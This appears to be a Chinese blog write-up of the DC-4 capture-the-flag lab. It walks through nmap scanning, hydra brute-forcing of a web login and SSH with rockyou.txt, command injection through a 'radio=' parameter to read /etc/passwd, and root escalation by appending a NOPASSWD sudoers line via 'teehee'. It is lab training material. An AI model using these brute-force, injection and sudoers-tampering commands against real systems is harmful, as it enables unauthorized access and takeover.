一、DC-4的信息收集
1.确定IP,端口号;
命令:nmap -sP 192.168.159.0/24
探测到主机的ip为192.168.1.165,下一步进行端口判断;
命令:nmap -A -p- -T4 192.168.1.165
查看源码,我们可以收集到以下信息:
1.页面通过post提交
2.用户名的由username接收
3.密码由password接收
4.表单信息提交到login.php页面进行登陆判断
二、通过暴力破解密码,成功登陆
1.确定密码字典,利用hydra进行爆破。
由于该页面为后台管理界面,所以我们猜测账号为admin,密码未知。
KALI系统自带一个密码字典,大概几十M
位置在/usr/share/wordlists/rockyou.txt.gz
我们利用hydra(海德拉)进行爆破
构建语句:hydra -l admin -P rockyou.txt 192.168.1.165 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
用密码登录
进入点击Run,并抓包我们发现其实Run就是执行命令
2.BP抓包,修改命令
我们打开BP ,设置好代理,进行抓包,果然发现命令:radio=
修改命令whoami,果然运行成功。
由此我们可以查看目标的/etc/passwd文件。
passwd文件储存着用户信息列表
3 进入用户家目录收集信息
经过进入三个家目录,发现jim的家目录里有一个备份信息,让我们进去看看
还是在BP中用修改radio= 来查看backups中的文件
发现是密码本,用hydra来爆破
我们将密码导出存放为passwd.txt文件
利用hydra爆破出ssh的账户密码。
命令:hydra -L /tmp/user.txt -P /tmp/passwd.txt ssh://192.168.1.165
1
注意:这里的user.txt存储的是我们找到的三个用户名,jim,charles,sam
passwd.txt存储的是我们找到的密码信息。
hydra -L user.txt -P pass.txt ssh://192.168.1.165
用ssh来登录
ssh jim@192.168.1.165 密码 jibril04
成功登陆,想看一下我们可以执行什么命令。发现并没有权限。
看一下ls,发现里面有一个mbox文件,我们cat查看一下。
打开我们发现的jim邮件,发现是charles发的,还附上了他的密码,由于我们之前爆破只爆破出jim的密码,在这里又得到了charles的密码,所以我们切换用户到charles看看
进入该用户,查看一下自己有什么命令可以执行,发现该账号并没有sudo的权限。但是有teehee这条命令。经过查找和老师的讲解。发现teehee其实是tee的变式。tee的作用是
tee-从标准输入读取并写入标准输出和文件
1
由于我们没有sudo权限,也就没有办法切换成root用户,但是teehee给了我们机会,输入此代码:
echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
这句话的意思是将charles用户赋予执行sudo的权限添加到/etc/sudoers里。
| 是管道符 将前面的输出添加到后面
sudo teehee -a 是用管理员权限使用teehee -a命令
teehee -a 是添加一条语句到 /etc/sudoers里
/etc/sudoers 里存着的用户都有执行sudo的权限。
添加成功,这时候我们sudo su 转换到root用户!成功!
扫一扫
1165
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
